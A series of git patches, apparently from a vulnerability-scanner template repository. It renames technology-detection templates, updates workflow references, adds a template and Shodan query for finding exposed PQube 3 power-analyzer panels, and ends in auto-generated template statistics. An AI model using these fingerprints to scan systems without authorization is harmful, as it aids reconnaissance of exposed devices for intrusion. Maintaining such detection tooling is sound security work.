13:41:16 +0530 Subject: [PATCH 0227/1415] Update and rename basic-auth-detection.yaml to basic-auth-detect.yaml --- .../{basic-auth-detection.yaml => basic-auth-detect.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename technologies/{basic-auth-detection.yaml => basic-auth-detect.yaml} (85%) diff --git a/technologies/basic-auth-detection.yaml b/technologies/basic-auth-detect.yaml similarity index 85% rename from technologies/basic-auth-detection.yaml rename to technologies/basic-auth-detect.yaml index 894c3892d0..92adee96a4 100644 --- a/technologies/basic-auth-detection.yaml +++ b/technologies/basic-auth-detect.yaml @@ -1,7 +1,7 @@ -id: basic-auth-detection +id: basic-auth-detect info: - name: Basic auth detection + name: Basic Auth Detection author: w4cky_ severity: info tags: tech,basic-auth From 32e7566ba11c2e6bc0cb59f97b74124ac9671155 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 13 Nov 2022 13:41:28 +0530 Subject: [PATCH 0228/1415] Update and rename bigip-detection.yaml to bigip-detect.yaml --- technologies/{bigip-detection.yaml => bigip-detect.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename technologies/{bigip-detection.yaml => bigip-detect.yaml} (96%) diff --git a/technologies/bigip-detection.yaml b/technologies/bigip-detect.yaml similarity index 96% rename from technologies/bigip-detection.yaml rename to technologies/bigip-detect.yaml index ae6ca2b5ce..35a7bd692f 100644 --- a/technologies/bigip-detection.yaml +++ b/technologies/bigip-detect.yaml @@ -1,4 +1,4 @@ -id: bigip-detection +id: bigip-detect info: name: BIGIP Cookie Detection @@ -26,4 +26,4 @@ requests: part: header group: 1 regex: - - '(BIGipServer[a-z\_\.\-\~0-9A-Z]*)=([!a-z0-9A-Z/.=]+)' \ No newline at end of file + - '(BIGipServer[a-z\_\.\-\~0-9A-Z]*)=([!a-z0-9A-Z/.=]+)' From 82620bc953e7be3c26c1fdc0330c7f00a670bdde Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 13 Nov 2022 13:41:36 +0530 Subject: [PATCH 0229/1415] Update and rename emqx-detection.yaml to emqx-detect.yaml --- technologies/{emqx-detection.yaml => emqx-detect.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{emqx-detection.yaml => emqx-detect.yaml} (94%) diff --git a/technologies/emqx-detection.yaml b/technologies/emqx-detect.yaml similarity index 94% rename from technologies/emqx-detection.yaml rename to technologies/emqx-detect.yaml index 0e5ecfb489..eef7c22d30 100644 --- a/technologies/emqx-detection.yaml +++ b/technologies/emqx-detect.yaml @@ -1,4 +1,4 @@ -id: emqx-detection +id: emqx-detect info: name: Emqx Detection From 0e9169328f9ebd48f8b9a3a5ad77a42e82041966 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 13 Nov 2022 13:41:44 +0530 Subject: [PATCH 0230/1415] Update and rename favicon-detection.yaml to favicon-detect.yaml --- technologies/{favicon-detection.yaml => favicon-detect.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{favicon-detection.yaml => favicon-detect.yaml} (99%) diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detect.yaml similarity index 99% rename from technologies/favicon-detection.yaml rename to technologies/favicon-detect.yaml index 85d895d826..94826f00f1 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detect.yaml @@ -1,4 +1,4 @@ -id: favicon-detection +id: favicon-detect info: name: favicon-detection From 85b3561f032f5a108140bfc0c5a20b592f79f0c9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 13 Nov 2022 13:41:51 +0530 Subject: [PATCH 0231/1415] Update and rename hikvision-detection.yaml to hikvision-detect.yaml --- .../{hikvision-detection.yaml => hikvision-detect.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{hikvision-detection.yaml => hikvision-detect.yaml} (95%) diff --git a/technologies/hikvision-detection.yaml b/technologies/hikvision-detect.yaml similarity index 95% rename from technologies/hikvision-detection.yaml rename to technologies/hikvision-detect.yaml index 21a9b4eae8..da81bdf290 100644 --- a/technologies/hikvision-detection.yaml +++ b/technologies/hikvision-detect.yaml @@ -1,4 +1,4 @@ -id: hikvision-detection +id: hikvision-detect info: name: Hikvision Detection From eb9b6484386919cb8e6d9f2577c21e741ab817b4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 13 Nov 2022 13:42:00 +0530 Subject: [PATCH 0232/1415] Update and rename jsf-detection.yaml to jsf-detect.yaml --- technologies/{jsf-detection.yaml => jsf-detect.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{jsf-detection.yaml => jsf-detect.yaml} (98%) diff --git a/technologies/jsf-detection.yaml b/technologies/jsf-detect.yaml similarity index 98% rename from technologies/jsf-detection.yaml rename to technologies/jsf-detect.yaml index 645c197715..26fa536ff9 100644 --- a/technologies/jsf-detection.yaml +++ b/technologies/jsf-detect.yaml @@ -1,4 +1,4 @@ -id: jsf-detection +id: jsf-detect info: name: JavaServer Faces Detection From 2575291fd3b6bec1bd58e878652ca6de16400a7f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 13 Nov 2022 13:44:16 +0530 Subject: [PATCH 0233/1415] Update aem-workflow.yaml --- workflows/aem-workflow.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/workflows/aem-workflow.yaml b/workflows/aem-workflow.yaml index 6ef96d04c9..2d53e381c1 100644 --- a/workflows/aem-workflow.yaml +++ b/workflows/aem-workflow.yaml @@ -6,6 +6,6 @@ info: description: A simple workflow that runs all Adobe Experience Manager related nuclei templates on a given target. workflows: - - template: technologies/aem-detection.yaml + - template: technologies/aem-detect.yaml subtemplates: - - tags: aem \ No newline at end of file + - tags: aem From 0e19456616a786ec23f4bf3ac582061c90784b8b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 13 Nov 2022 13:48:54 +0530 Subject: [PATCH 0234/1415] workflows fixed --- workflows/cisco-meraki-workflow.yaml | 2 +- workflows/dahua-workflow.yaml | 2 +- workflows/hikvision-workflow.yaml | 2 +- workflows/mautic-workflow.yaml | 2 +- workflows/opensns-workflow.yaml | 2 +- workflows/ricoh-workflow.yaml | 2 +- 6 files changed, 6 insertions(+), 6 deletions(-) diff --git a/workflows/cisco-meraki-workflow.yaml b/workflows/cisco-meraki-workflow.yaml index a8a669f97f..2ae9af5428 100644 --- a/workflows/cisco-meraki-workflow.yaml +++ b/workflows/cisco-meraki-workflow.yaml @@ -6,7 +6,7 @@ info: description: A simple workflow that runs all Cisco Meraki related nuclei templates on a given target. workflows: - - template: technologies/favicon-detection.yaml + - template: technologies/favicon-detect.yaml matchers: - name: meraki subtemplates: diff --git a/workflows/dahua-workflow.yaml b/workflows/dahua-workflow.yaml index 11db88daa3..1272f7d4ae 100644 --- a/workflows/dahua-workflow.yaml +++ b/workflows/dahua-workflow.yaml @@ -6,7 +6,7 @@ info: description: A simple workflow that runs all Dahua related nuclei templates on a given target. workflows: - - template: technologies/favicon-detection.yaml + - template: technologies/favicon-detect.yaml matchers: - name: dahua subtemplates: diff --git a/workflows/hikvision-workflow.yaml b/workflows/hikvision-workflow.yaml index 95b090366a..2e056160bf 100644 --- a/workflows/hikvision-workflow.yaml +++ b/workflows/hikvision-workflow.yaml @@ -7,6 +7,6 @@ info: workflows: - - template: technologies/hikvision-detection.yaml + - template: technologies/hikvision-detect.yaml subtemplates: - template: cves/2021/CVE-2021-36260.yaml \ No newline at end of file diff --git a/workflows/mautic-workflow.yaml b/workflows/mautic-workflow.yaml index 4dba9c9264..f33389707f 100644 --- a/workflows/mautic-workflow.yaml +++ b/workflows/mautic-workflow.yaml @@ -6,7 +6,7 @@ info: description: A simple workflow that runs all Mautic CRM related nuclei templates on a given target. workflows: - - template: technologies/favicon-detection.yaml + - template: technologies/favicon-detect.yaml matchers: - name: mautic subtemplates: diff --git a/workflows/opensns-workflow.yaml b/workflows/opensns-workflow.yaml index 6d2f4db212..ce527f47d0 100644 --- a/workflows/opensns-workflow.yaml +++ b/workflows/opensns-workflow.yaml @@ -6,7 +6,7 @@ info: description: A simple workflow that runs all OpenSNS related nuclei templates on a given target. workflows: - - template: technologies/favicon-detection.yaml + - template: technologies/favicon-detect.yaml matchers: - name: opensns subtemplates: diff --git a/workflows/ricoh-workflow.yaml b/workflows/ricoh-workflow.yaml index de2b143137..c3b8c7c975 100644 --- a/workflows/ricoh-workflow.yaml +++ b/workflows/ricoh-workflow.yaml @@ -6,7 +6,7 @@ info: description: A simple workflow that runs all Ricoh related nuclei templates on a given target. workflows: - - template: technologies/favicon-detection.yaml + - template: technologies/favicon-detect.yaml matchers: - name: ricoh subtemplates: From c201401f723055cd50d90b890446c27fc4ae541b Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 13 Nov 2022 14:58:47 +0530 Subject: [PATCH 0235/1415] PQube 3 Power Analyzers --- exposed-panels/pqube-power-analyzers.yaml | 27 +++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposed-panels/pqube-power-analyzers.yaml diff --git a/exposed-panels/pqube-power-analyzers.yaml b/exposed-panels/pqube-power-analyzers.yaml new file mode 100644 index 0000000000..fce8040501 --- /dev/null +++ b/exposed-panels/pqube-power-analyzers.yaml @@ -0,0 +1,27 @@ +id: pqube-power-analyzers + +info: + name: PQube 3 Power Analyzers + author: pussycat0x + severity: low + metadata: + verified: true + shodan-query: title:"PQube 3" + tags: misconfig,iot,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}/' + - '{{BaseURL}}/status.html' + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'BlockTitle">PQube 3 Information' + - 'Power Configuration:' + + - type: status + status: + - 200 From 28b8d77a74f19012c011983837cb3afe63bd3be9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 13 Nov 2022 10:23:16 +0000 Subject: [PATCH 0236/1415] Auto Generated New Template Addition List [Sun Nov 13 10:23:16 UTC 2022] :robot: --- .new-additions | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.new-additions b/.new-additions index baaa550098..2c18b8bedd 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ default-logins/samsung/samsung-printer-default-login.yaml exposed-panels/airnotifier-panel.yaml exposed-panels/deluge-webui-panel.yaml exposed-panels/dplus-dashboard.yaml +exposed-panels/hydra-dashboard.yaml exposed-panels/jumpserver-panel.yaml exposed-panels/kfm/kaes-file-manager.yaml exposed-panels/kfm/kfm-login-panel.yaml @@ -33,7 +34,6 @@ misconfiguration/codis-dashboard.yaml misconfiguration/confluence-dashboard.yaml misconfiguration/elastic-hd-dashboard.yaml misconfiguration/encompass-cm1-homepage.yaml -misconfiguration/hydra-dashboard.yaml misconfiguration/installer/openmage-install.yaml misconfiguration/installer/testrail-install.yaml misconfiguration/installer/unifi-wizard-install.yaml @@ -44,8 +44,8 @@ misconfiguration/pa11y-dashboard.yaml misconfiguration/puppetdb-dashboard.yaml misconfiguration/ray-dashboard.yaml misconfiguration/system-properties-exposure.yaml -network/detection/ibm-d2b-database-server-detect.yaml -network/detection/mikrotik-routeros-api-detect.yaml +network/detection/ibm-d2b-database-server.yaml +network/detection/mikrotik-routeros-api.yaml technologies/aem-cms.yaml technologies/ansible-awx-detect.yaml technologies/mongoose-server.yaml From 20cd96e6dc2385bb29180045ce2721c3426f51cc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 13 Nov 2022 10:27:56 +0000 Subject: [PATCH 0237/1415] Auto Generated Templates Stats [Sun Nov 13 10:27:56 UTC 2022] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 4356 +++++++++++++++++++++--------------------- TOP-10.md | 18 +- 3 files changed, 2206 insertions(+), 2170 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 7a7aea8b3e..524711ad89 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1510},{"name":"panel","count":736},{"name":"edb","count":574},{"name":"xss","count":526},{"name":"lfi","count":518},{"name":"exposure","count":505},{"name":"wordpress","count":455},{"name":"cve2021","count":365},{"name":"wp-plugin","count":350},{"name":"rce","count":342},{"name":"tech","count":316},{"name":"packetstorm","count":290},{"name":"wpscan","count":242},{"name":"cve2022","count":240},{"name":"token-spray","count":235},{"name":"cve2020","count":217},{"name":"misconfig","count":197},{"name":"","count":195},{"name":"unauth","count":183},{"name":"wp","count":172},{"name":"kev","count":167},{"name":"config","count":162},{"name":"cve2018","count":145},{"name":"cve2019","count":137},{"name":"joomla","count":135},{"name":"oast","count":127},{"name":"default-login","count":127},{"name":"apache","count":124},{"name":"iot","count":119},{"name":"authenticated","count":116},{"name":"cve2010","count":111},{"name":"sqli","count":108},{"name":"router","count":90},{"name":"redirect","count":89},{"name":"files","count":89},{"name":"login","count":88},{"name":"devops","count":75},{"name":"takeover","count":74},{"name":"token","count":73},{"name":"ssrf","count":72},{"name":"network","count":71},{"name":"cve2017","count":70},{"name":"cms","count":67},{"name":"auth-bypass","count":64},{"name":"file","count":63},{"name":"oracle","count":62},{"name":"intrusive","count":58},{"name":"seclists","count":56},{"name":"disclosure","count":54},{"name":"install","count":53},{"name":"cisco","count":49},{"name":"cve2016","count":49},{"name":"oss","count":48},{"name":"google","count":48},{"name":"fileupload","count":47},{"name":"cve2015","count":47},{"name":"adobe","count":45},{"name":"aem","count":41},{"name":"cve2014","count":41},{"name":"plugin","count":41},{"name":"vulhub","count":38},{"name":"vmware","count":38},{"name":"atlassian","count":37},{"name":"logs","count":36},{"name":"traversal","count":35},{"name":"tenable","count":35},{"name":"springboot","count":35},{"name":"hackerone","count":33},{"name":"injection","count":33},{"name":"jira","count":32},{"name":"listing","count":31},{"name":"kubernetes","count":29},{"name":"generic","count":28},{"name":"huntr","count":28},{"name":"dns","count":27},{"name":"debug","count":26},{"name":"log4j","count":26},{"name":"sap","count":25},{"name":"cnvd","count":25},{"name":"microsoft","count":24},{"name":"proxy","count":23},{"name":"jndi","count":23},{"name":"misc","count":23},{"name":"aws","count":22},{"name":"php","count":22},{"name":"zoho","count":21},{"name":"fuzz","count":21},{"name":"wp-theme","count":21},{"name":"manageengine","count":21},{"name":"weblogic","count":20},{"name":"cve2012","count":20},{"name":"tomcat","count":19},{"name":"api","count":19},{"name":"camera","count":19},{"name":"deserialization","count":19},{"name":"cicd","count":19},{"name":"cloud","count":19},{"name":"k8s","count":19},{"name":"dlink","count":18},{"name":"service","count":18},{"name":"ibm","count":18},{"name":"jenkins","count":17},{"name":"firewall","count":17},{"name":"wavlink","count":17},{"name":"ftp","count":17},{"name":"struts","count":16},{"name":"nginx","count":15},{"name":"gitlab","count":15},{"name":"cve2011","count":15},{"name":"cve2009","count":15},{"name":"xxe","count":15},{"name":"fortinet","count":14},{"name":"android","count":14},{"name":"msf","count":14},{"name":"java","count":14},{"name":"printer","count":14},{"name":"domainmod","count":14},{"name":"hp","count":14},{"name":"amazon","count":13},{"name":"cve2013","count":13},{"name":"woocommerce","count":13},{"name":"status","count":13},{"name":"abstractapi","count":13},{"name":"magento","count":13},{"name":"lfr","count":13},{"name":"rails","count":12},{"name":"graphql","count":12},{"name":"microweber","count":12},{"name":"netsweeper","count":12},{"name":"drupal","count":12},{"name":"confluence","count":12},{"name":"netgear","count":12},{"name":"backup","count":12},{"name":"ruijie","count":12},{"name":"cisa","count":11},{"name":"webserver","count":11},{"name":"vpn","count":11},{"name":"github","count":11},{"name":"airflow","count":11},{"name":"fortigate","count":11},{"name":"ssl","count":11},{"name":"cve2008","count":11},{"name":"backdoor","count":11},{"name":"cnvd2021","count":11},{"name":"azure","count":11},{"name":"glpi","count":10},{"name":"dell","count":10},{"name":"ruby","count":10},{"name":"spring","count":10},{"name":"django","count":10},{"name":"jolokia","count":10},{"name":"laravel","count":10},{"name":"grafana","count":10},{"name":"zyxel","count":10},{"name":"coldfusion","count":10},{"name":"sonicwall","count":9},{"name":"zimbra","count":9},{"name":"windows","count":9},{"name":"kube","count":9},{"name":"mirai","count":9},{"name":"vcenter","count":9},{"name":"dedecms","count":9},{"name":"prometheus","count":9},{"name":"iis","count":9},{"name":"phpmyadmin","count":9},{"name":"wso2","count":9},{"name":"git","count":9},{"name":"ssti","count":9},{"name":"fastjson","count":9},{"name":"zabbix","count":9},{"name":"elasticsearch","count":8},{"name":"metadata","count":8},{"name":"auth","count":8},{"name":"citrix","count":8},{"name":"audit","count":8},{"name":"hms","count":8},{"name":"headless","count":8},{"name":"jboss","count":8},{"name":"kafka","count":8},{"name":"cisco-switch","count":8},{"name":"config-audit","count":8},{"name":"solr","count":8},{"name":"recon","count":8},{"name":"scada","count":8},{"name":"cnvd2020","count":7},{"name":"python","count":7},{"name":"jetbrains","count":7},{"name":"go","count":7},{"name":"exchange","count":7},{"name":"maps","count":7},{"name":"symfony","count":7},{"name":"icewarp","count":7},{"name":"mail","count":7},{"name":"docker","count":7},{"name":"squirrelmail","count":7},{"name":"firebase","count":7},{"name":"nodejs","count":7},{"name":"npm","count":7},{"name":"druid","count":7},{"name":"bucket","count":7},{"name":"ssh","count":7},{"name":"seeyon","count":7},{"name":"solarview","count":7},{"name":"opencats","count":7},{"name":"blind","count":7},{"name":"rconfig","count":6},{"name":"setup","count":6},{"name":"slack","count":6},{"name":"websphere","count":6},{"name":"liferay","count":6},{"name":"activemq","count":6},{"name":"huawei","count":6},{"name":"zhiyuan","count":6},{"name":"artica","count":6},{"name":"microstrategy","count":6},{"name":"emerge","count":6},{"name":"lucee","count":6},{"name":"openvpn","count":6},{"name":"samsung","count":6},{"name":"opensis","count":6},{"name":"moodle","count":6},{"name":"magmi","count":6},{"name":"kubelet","count":6},{"name":"ognl","count":6},{"name":"ofbiz","count":6},{"name":"sitecore","count":6},{"name":"fpd","count":6},{"name":"crlf","count":6},{"name":"bypass","count":6},{"name":"jetty","count":6},{"name":"enum","count":6},{"name":"cobbler","count":6},{"name":"vms","count":6},{"name":"jamf","count":6},{"name":"bigip","count":6},{"name":"ecology","count":6},{"name":"cache","count":5},{"name":"avideo","count":5},{"name":"strapi","count":5},{"name":"symantec","count":5},{"name":"redis","count":5},{"name":"circarlife","count":5},{"name":"storage","count":5},{"name":"firmware","count":5},{"name":"thinkphp","count":5},{"name":"carrental","count":5},{"name":"apisix","count":5},{"name":"minio","count":5},{"name":"keycloak","count":5},{"name":"cockpit","count":5},{"name":"solarwinds","count":5},{"name":"scan","count":5},{"name":"fatpipe","count":5},{"name":"metinfo","count":5},{"name":"fortios","count":5},{"name":"rseenet","count":5},{"name":"admin","count":5},{"name":"leak","count":5},{"name":"node","count":5},{"name":"alibaba","count":5},{"name":"gocd","count":5},{"name":"rfi","count":5},{"name":"db","count":5},{"name":"gogs","count":5},{"name":"plesk","count":5},{"name":"nagios","count":5},{"name":"elfinder","count":5},{"name":"error","count":5},{"name":"awstats","count":5},{"name":"prestashop","count":5},{"name":"74cms","count":5},{"name":"vbulletin","count":4},{"name":"artifactory","count":4},{"name":"wcs","count":4},{"name":"redmine","count":4},{"name":"console","count":4},{"name":"database","count":4},{"name":"nexus","count":4},{"name":"oa","count":4},{"name":"gnuboard","count":4},{"name":"jellyfin","count":4},{"name":"filemanager","count":4},{"name":"hashicorp","count":4},{"name":"panos","count":4},{"name":"adminer","count":4},{"name":"nosqli","count":4},{"name":"thinkcmf","count":4},{"name":"vrealize","count":4},{"name":"phpinfo","count":4},{"name":"cacti","count":4},{"name":"ems","count":4},{"name":"resin","count":4},{"name":"hybris","count":4},{"name":"stripe","count":4},{"name":"telerik","count":4},{"name":"kevinlab","count":4},{"name":"axigen","count":4},{"name":"royalevent","count":4},{"name":"bmc","count":4},{"name":"couchdb","count":4},{"name":"zte","count":4},{"name":"smtp","count":4},{"name":"sophos","count":4},{"name":"ampache","count":4},{"name":"hongdian","count":4},{"name":"mailchimp","count":4},{"name":"roxy","count":4},{"name":"terramaster","count":4},{"name":"parallels","count":4},{"name":"umbraco","count":4},{"name":"sql","count":4},{"name":"openemr","count":4},{"name":"mongodb","count":4},{"name":"beyondtrust","count":4},{"name":"kibana","count":4},{"name":"hpe","count":4},{"name":"postmessage","count":4},{"name":"aspose","count":4},{"name":"voip","count":4},{"name":"asp","count":4},{"name":"tenda","count":4},{"name":"s3","count":4},{"name":"photo","count":4},{"name":"paypal","count":4},{"name":"cnvd2019","count":4},{"name":"cve2007","count":4},{"name":"springcloud","count":4},{"name":"puppet","count":4},{"name":"elastic","count":4},{"name":"flink","count":4},{"name":"kentico","count":4},{"name":"horde","count":4},{"name":"tikiwiki","count":4},{"name":"yeswiki","count":4},{"name":"caucho","count":4},{"name":"linkerd","count":4},{"name":"sangfor","count":4},{"name":"hoteldruid","count":4},{"name":"hikvision","count":4},{"name":"search","count":4},{"name":"prtg","count":4},{"name":"sendgrid","count":4},{"name":"telesquare","count":4},{"name":"oauth","count":4},{"name":"xmlrpc","count":4},{"name":"sonarqube","count":4},{"name":"gitea","count":4},{"name":"phppgadmin","count":4},{"name":"bitrix","count":3},{"name":"graph","count":3},{"name":"axis","count":3},{"name":"3cx","count":3},{"name":"harbor","count":3},{"name":"samba","count":3},{"name":"rabbitmq","count":3},{"name":"httpbin","count":3},{"name":"cloudflare","count":3},{"name":"bruteforce","count":3},{"name":"blockchain","count":3},{"name":"dreambox","count":3},{"name":"openfire","count":3},{"name":"seagate","count":3},{"name":"sentry","count":3},{"name":"digitalrebar","count":3},{"name":"jfrog","count":3},{"name":"openam","count":3},{"name":"lotus","count":3},{"name":"ebs","count":3},{"name":"getsimple","count":3},{"name":"nacos","count":3},{"name":"facebook","count":3},{"name":"lansweeper","count":3},{"name":"modem","count":3},{"name":"circleci","count":3},{"name":"dolibarr","count":3},{"name":"heroku","count":3},{"name":"messaging","count":3},{"name":"hsphere","count":3},{"name":"mautic","count":3},{"name":"tableau","count":3},{"name":"codeigniter","count":3},{"name":"sharepoint","count":3},{"name":"fanruan","count":3},{"name":"fileman","count":3},{"name":"buffalo","count":3},{"name":"express","count":3},{"name":"concrete","count":3},{"name":"processwire","count":3},{"name":"actuator","count":3},{"name":"pentaho","count":3},{"name":"globalprotect","count":3},{"name":"avtech","count":3},{"name":"log","count":3},{"name":"finecms","count":3},{"name":"rocketchat","count":3},{"name":"sugarcrm","count":3},{"name":"teamcity","count":3},{"name":"kingsoft","count":3},{"name":"netdata","count":3},{"name":"jeesns","count":3},{"name":"technology","count":3},{"name":"pip","count":3},{"name":"bigant","count":3},{"name":"selea","count":3},{"name":"voipmonitor","count":3},{"name":"qnap","count":3},{"name":"nortek","count":3},{"name":"zend","count":3},{"name":"glassfish","count":3},{"name":"odoo","count":3},{"name":"wordfence","count":3},{"name":"subrion","count":3},{"name":"splunk","count":3},{"name":"ec2","count":3},{"name":"metabase","count":3},{"name":"mongo","count":3},{"name":"targa","count":3},{"name":"r-seenet","count":3},{"name":"weiphp","count":3},{"name":"webadmin","count":3},{"name":"trendnet","count":3},{"name":"steve","count":3},{"name":"webmail","count":3},{"name":"httpserver","count":3},{"name":"thruk","count":3},{"name":"dom","count":3},{"name":"linksys","count":3},{"name":"microfocus","count":3},{"name":"netlify","count":3},{"name":"ivanti","count":3},{"name":"panabit","count":3},{"name":"square","count":3},{"name":"aptus","count":3},{"name":"graylog","count":3},{"name":"mobileiron","count":3},{"name":"thinfinity","count":3},{"name":"cve2005","count":3},{"name":"smb","count":3},{"name":"mcafee","count":3},{"name":"ruckus","count":3},{"name":"drawio","count":3},{"name":"geowebserver","count":3},{"name":"epson","count":3},{"name":"trixbox","count":3},{"name":"synology","count":3},{"name":"detect","count":3},{"name":"jupyter","count":3},{"name":"movable","count":3},{"name":"labkey","count":3},{"name":"geoserver","count":3},{"name":"digitalocean","count":3},{"name":"goanywhere","count":3},{"name":"axis2","count":3},{"name":"redash","count":3},{"name":"kkfileview","count":3},{"name":"zeroshell","count":3},{"name":"grav","count":3},{"name":"rackn","count":3},{"name":"proftpd","count":3},{"name":"key","count":3},{"name":"consul","count":3},{"name":"octobercms","count":3},{"name":"servicenow","count":3},{"name":"dotcms","count":3},{"name":"intercom","count":3},{"name":"fuelcms","count":3},{"name":"centos","count":3},{"name":"openbmcs","count":3},{"name":"ampps","count":3},{"name":"elementor","count":3},{"name":"empirecms","count":3},{"name":"bitbucket","count":3},{"name":"typo3","count":3},{"name":"rlm","count":3},{"name":"pfsense","count":3},{"name":"dzzoffice","count":3},{"name":"mantisbt","count":3},{"name":"matrix","count":3},{"name":"nuuo","count":3},{"name":"httpd","count":3},{"name":"webpagetest","count":2},{"name":"qcubed","count":2},{"name":"highmail","count":2},{"name":"gateway","count":2},{"name":"wamp","count":2},{"name":"ovirt","count":2},{"name":"syslog","count":2},{"name":"jsf","count":2},{"name":"konga","count":2},{"name":"rstudio","count":2},{"name":"domxss","count":2},{"name":"werkzeug","count":2},{"name":"phpshowtime","count":2},{"name":"wooyun","count":2},{"name":"forcepoint","count":2},{"name":"gryphon","count":2},{"name":"shellshock","count":2},{"name":"owasp","count":2},{"name":"auerswald","count":2},{"name":"gophish","count":2},{"name":"netis","count":2},{"name":"ghost","count":2},{"name":"dotnet","count":2},{"name":"portal","count":2},{"name":"draytek","count":2},{"name":"secret","count":2},{"name":"atmail","count":2},{"name":"jeedom","count":2},{"name":"projectsend","count":2},{"name":"waf","count":2},{"name":"overflow","count":2},{"name":"accela","count":2},{"name":"seeddms","count":2},{"name":"guacamole","count":2},{"name":"espeasy","count":2},{"name":"newrelic","count":2},{"name":"tileserver","count":2},{"name":"clamav","count":2},{"name":"codemeter","count":2},{"name":"xenmobile","count":2},{"name":"couchbase","count":2},{"name":"plastic","count":2},{"name":"natshell","count":2},{"name":"pgadmin","count":2},{"name":"dvr","count":2},{"name":"nasos","count":2},{"name":"weather","count":2},{"name":"itop","count":2},{"name":"ebook","count":2},{"name":"sysaid","count":2},{"name":"sidekiq","count":2},{"name":"matomo","count":2},{"name":"conductor","count":2},{"name":"reolink","count":2},{"name":"unisharp","count":2},{"name":"totemomail","count":2},{"name":"text","count":2},{"name":"dashboard","count":2},{"name":"dotnetnuke","count":2},{"name":"orchid","count":2},{"name":"mailgun","count":2},{"name":"pulse","count":2},{"name":"linux","count":2},{"name":"csrf","count":2},{"name":"cgi","count":2},{"name":"loqate","count":2},{"name":"ucmdb","count":2},{"name":"avaya","count":2},{"name":"globaldomains","count":2},{"name":"wwbn","count":2},{"name":"pcoip","count":2},{"name":"froxlor","count":2},{"name":"ranger","count":2},{"name":"eris","count":2},{"name":"gitbook","count":2},{"name":"wpqa","count":2},{"name":"telnet","count":2},{"name":"frp","count":2},{"name":"xnat","count":2},{"name":"mida","count":2},{"name":"sourcecodester","count":2},{"name":"virtua","count":2},{"name":"dos","count":2},{"name":"gcp","count":2},{"name":"novnc","count":2},{"name":"webalizer","count":2},{"name":"places","count":2},{"name":"xceedium","count":2},{"name":"swagger","count":2},{"name":"acrolinx","count":2},{"name":"graphite","count":2},{"name":"phpstorm","count":2},{"name":"pega","count":2},{"name":"watchguard","count":2},{"name":"sqlite","count":2},{"name":"discourse","count":2},{"name":"frontpage","count":2},{"name":"yonyou","count":2},{"name":"spark","count":2},{"name":"temenos","count":2},{"name":"hasura","count":2},{"name":"jquery","count":2},{"name":"javamelody","count":2},{"name":"shenyu","count":2},{"name":"cargo","count":2},{"name":"supermicro","count":2},{"name":"pbootcms","count":2},{"name":"rockmongo","count":2},{"name":"superset","count":2},{"name":"skycaiji","count":2},{"name":"openssh","count":2},{"name":"avantfax","count":2},{"name":"vidyo","count":2},{"name":"node-red-dashboard","count":2},{"name":"pam","count":2},{"name":"osticket","count":2},{"name":"ambari","count":2},{"name":"piwigo","count":2},{"name":"opsview","count":2},{"name":"yii","count":2},{"name":"impresscms","count":2},{"name":"bitly","count":2},{"name":"kavita","count":2},{"name":"carel","count":2},{"name":"kiwitcms","count":2},{"name":"ametys","count":2},{"name":"azkaban","count":2},{"name":"wildfly","count":2},{"name":"nextcloud","count":2},{"name":"corebos","count":2},{"name":"terraform","count":2},{"name":"cassandra","count":2},{"name":"netscaler","count":2},{"name":"middleware","count":2},{"name":"uwsgi","count":2},{"name":"cve2006","count":2},{"name":"idor","count":2},{"name":"hadoop","count":2},{"name":"tplink","count":2},{"name":"zzzcms","count":2},{"name":"igs","count":2},{"name":"openresty","count":2},{"name":"rosariosis","count":2},{"name":"contao","count":2},{"name":"dataiku","count":2},{"name":"lantronix","count":2},{"name":"ecoa","count":2},{"name":"gespage","count":2},{"name":"kafdrop","count":2},{"name":"sniplets","count":2},{"name":"code42","count":2},{"name":"xml","count":2},{"name":"password","count":2},{"name":"alienvault","count":2},{"name":"idrac","count":2},{"name":"craftcms","count":2},{"name":"rancher","count":2},{"name":"zerof","count":2},{"name":"erxes","count":2},{"name":"hospital","count":2},{"name":"vscode","count":2},{"name":"zms","count":2},{"name":"motorola","count":2},{"name":"gitlist","count":2},{"name":"xampp","count":2},{"name":"zblogphp","count":2},{"name":"landesk","count":2},{"name":"resourcespace","count":2},{"name":"cloudinary","count":2},{"name":"books","count":2},{"name":"rundeck","count":2},{"name":"iptime","count":2},{"name":"j2ee","count":2},{"name":"sequoiadb","count":2},{"name":"h3c","count":2},{"name":"jmx","count":2},{"name":"atom","count":2},{"name":"appcms","count":2},{"name":"docs","count":2},{"name":"netsus","count":2},{"name":"chyrp","count":2},{"name":"hjtcloud","count":2},{"name":"hubspot","count":2},{"name":"otobo","count":2},{"name":"sdwan","count":2},{"name":"redhat","count":2},{"name":"akkadian","count":2},{"name":"javascript","count":2},{"name":"twitt